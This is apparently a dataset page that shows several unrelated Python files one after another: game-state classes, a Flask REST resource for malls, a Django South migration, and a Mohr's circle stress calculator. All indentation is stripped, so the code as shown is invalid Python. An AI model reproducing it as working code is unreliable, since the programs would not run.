self.rows = rows
self.cols = cols
class GameChat(object):
def __init__(self, messages=[], name="", state="", size=0, map="", me=GamePlayer(), players=[]):
self.messages = messages
self.name = name
self.state = state
self.size = size
self.map = map
self.me = me
self.players = players
class ChatAnalysis(object):
def __init__(self, enemy_kills, ally_kills, is_in_emergency_meeting):
self.enemy_kills = enemy_kills
self.ally_kills = ally_kills
self.is_in_emergency_meeting = is_in_emergency_meeting
class Snapshot(object):
def __init__(self, map, map_size, me_symbol, xy_me, cell_me, xy_flag, xy_my_flag,
xy_players_allies, xy_players_enemies, loyalty, target, energy,
enemies_with_status, allies_with_status):
self.map = map
self.map_size = map_size
self.me_symbol = me_symbol
self.xy_me = xy_me
self.cell_me = cell_me
self.xy_flag = xy_flag
self.xy_my_flag = xy_my_flag
self.xy_players_allies = xy_players_allies
self.xy_players_enemies = xy_players_enemies
self.loyalty = loyalty
self.target = target
self.my_energy = energy
self.enemies_with_status = enemies_with_status
self.allies_with_status = allies_with_status
|
from flask_restful import Resource
from appcode.models.mall import MallModel
class Mall(Resource):
def get(self, name):
mall = MallModel.find_by_name(name)
if mall:
return mall.json()
return {"message": "Mall not found..."}, 404
def post(self, name):
if MallModel.find_by_name(name):
return {"message": "A mall with name '{}' already exists.".format(name)},400
mall = MallModel(name)
try:
mall.save_to_db()
except:
return {"message": "An error occurred while creating the mall."}, 500
return mall.json(), 201
def delete(self, name):
mall = MallModel.find_by_name(name)
if mall:
mall.delete_from_db()
return {"message": "Mall deleted."}
class MallList(Resource):
def get(self):
return {"malls": [mall.json() for mall in MallModel.query.all()]} |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'FeedPage'
db.delete_table('rss_feeds_feedpage')
# Deleting model 'FeedXML'
db.delete_table('rss_feeds_feedxml')
def backwards(self, orm):
# Adding model 'FeedPage'
db.create_table('rss_feeds_feedpage', (
('feed', self.gf('django.db.models.fields.related.OneToOneField')(related_name='feed_page', unique=True, to=orm['rss_feeds.Feed'])),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('page_data', self.gf('utils.compressed_textfield.StoryField')(null=True, blank=True)),
))
db.send_create_signal('rss_feeds', ['FeedPage'])
# Adding model 'FeedXML'
db.create_table('rss_feeds_feedxml', (
('feed', self.gf('django.db.models.fields.related.OneToOneField')(related_name='feed_xml', unique=True, to=orm['rss_feeds.Feed'])),
('rss_xml', self.gf('utils.compressed_textfield.StoryField')(null=True, blank=True)),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
))
db.send_create_signal('rss_feeds', ['FeedXML'])
models = {
'rss_feeds.duplicatefeed': {
'Meta': {'object_name': 'DuplicateFeed'},
'duplicate_address': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'duplicate_feed_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'feed': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'duplicate_addresses'", 'to': "orm['rss_feeds.Feed']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'rss_feeds.feed': {
'Meta': {'ordering': "['feed_title']", 'object_name': 'Feed', 'db_table': "'feeds'"},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'active_subscribers': ('django.db.models.fields.IntegerField', [], {'default': '-1', 'db_index': 'True'}),
'average_stories_per_month': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'creation': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'days_to_trim': ('django.db.models.fields.IntegerField', [], {'default': '90'}),
'etag': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'exception_code': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'feed_address': ('django.db.models.fields.URLField', [], {'unique': 'True', 'max_length': '255'}),
'feed_link': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'feed_title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'fetched_once': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'has_feed_exception': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'has_page_exception': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_load_time': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'last_modified': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'last_update': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'min_to_decay': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'next_scheduled_update': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'num_subscribers': ('django.db.models.fields.IntegerField', [], {'default': '-1'}),
'premium_subscribers': ('django.db.models.fields.IntegerField', [], {'default': '-1'}),
'queued_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'stories_last_month': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'rss_feeds.feeddata': {
'Meta': {'object_name': 'FeedData'},
'feed': ('utils.fields.AutoOneToOneField', [], {'related_name': "'data'", 'unique': 'True', 'to': "orm['rss_feeds.Feed']"}),
'feed_tagline': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'popular_authors': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
'popular_tags': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'story_count_history': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'rss_feeds.feedloadtime': {
'Meta': {'object_name': 'FeedLoadtime'},
'date_accessed': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'feed': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['rss_feeds.Feed']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'loadtime': ('django.db.models.fields.FloatField', [], {})
},
'rss_feeds.feedupdatehistory': {
'Meta': {'object_name': 'FeedUpdateHistory'},
'average_per_feed': ('django.db.models.fields.DecimalField', [], {'max_digits': '4', 'decimal_places': '1'}),
'fetch_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'number_of_feeds': ('django.db.models.fields.IntegerField', [], {}),
'seconds_taken': ('django.db.models.fields.IntegerField', [], {})
}
}
complete_apps = ['rss_feeds']
|
# Author: Agyeya Mishra
# Institute: Delhi Technological University (formerly, Delhi College of Engineering)
# Language: Python
# Version: 3.x
# Environment: PyCharm
# This script plots Mohr's Circle when given the two-dimensional state of stress.
#Importing libraries
#
# Numpy is a general-purpose array-processing package in Python.
import numpy as np
# Matplotlib is a plotting library for creating static, animated, and interactive visualizations in Python.
# Pyplot is a Matplotlib module which provides a MATLAB-like interface.
import matplotlib.pyplot as plt
import math
# Function for Mohr's Circle
def drawMohrsCircle():
# Taking user input for normal stress in x-direction
σx = float(input('Enter the value of σx = '))
# Taking user input for normal stress in y-direction
σy = float(input('Enter the value of σy = '))
# Taking user input for tangetial stress in xy plane
τxy = float(input('Enter the value of τxy = '))
# Taking user input for stress unit
u = input('Enter the stress unit = ')
#Taking user input for angle (in degrees) of plane's axis from x-axis
#Here, positive angles are considered counter clockwise
w = float(input("Enter the angle (in degrees) of plane's axis from x axis (here, +ve angles are counter clockwise), θ = "))
θ = math.radians(w)
R = np.sqrt(0.25 * (σx - σy) ** 2 + (τxy) ** 2)
σavg = (σx + σy) / 2
ψ = np.linspace(0, 2 * np.pi, 360)
x = σavg + R * np.cos(ψ)
y = R * (np.sin(ψ))
φ1 = math.degrees(0.5 * math.atan(2 * τxy / (σx - σy)))
φ2 = φ1 + 90
σθ1 = σavg + R * np.cos(2 * np.radians(φ1) + 2 * θ)
σθ2 = σavg + R * np.cos(2 * np.radians(φ1) + 2 * θ + np.pi)
τθ = R * np.sin(2 * np.radians(φ1) + 2 * θ)
print(f'''
Radius, R = √(0.25*(σx-σy)^2 + τxy^2)
= √(0.25*({σx}-{σy})^2 + {τxy}^2) = {R} {u}
Average Stress, (which acts at the Center of Mohr's Circle)
= σavg = (σx + σy)/2 = ({σx} + {σy})/2 = {σavg} {u}
Principal Stresses:
σ1 = σavg + R = {σavg} + {R} = {σavg + R} {u}
σ2 = σavg - R = {σavg} - {R} = {σavg - R} {u}
Angle which σ1 makes with the x-axis,
φ1 = 0.5(atan(2*τxy/(σx - σy)) = 0.5 * atan(2*{τxy}/({σx} - {σy})) = {φ1} degrees
Angle which σ2 makes with the x-axis,
φ2 = φ1 + 90 = {φ2} degrees
Maximum Shear Stress = τmax = R = {R} {u}
It occurs at, α = φ1 + 45 = {φ1 + 45} degrees
Stresses at a plane with axis at θ anticlockwise from x axis,
σθ1 = σavg + R* Cos(2φ1 + 2θ) = {σavg} + {R}* Cos({2 * φ1 + 2 * θ})
= {σθ1}, {u}
σθ2 = σavg + R* Cos(2φ1 + 2θ + pi) =
{σθ2} {u}
τθ = R*Sin(2*φ1 + 2*θ) = {R * np.sin(2 * np.radians(φ1) + 2 * θ)} {u}
''')
# Plotting Mohr's Circle
plt.plot(x, y)
plt.plot([σavg - R - 10, σavg + R + 10], [0, 0], linestyle='--', color='black')
plt.plot([σavg, σavg], [-R - 10, R + 10], linestyle='--', color='black')
plt.plot([σx, σy], [-τxy, τxy], [σx, σx], [-τxy, 0], [σy, σy], [τxy, 0], linestyle='-', color='green')
plt.xlabel('σ')
plt.ylabel('τ')
plt.title("Mohr's Circle")
plt.show()
# Function Call
drawMohrsCircle()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.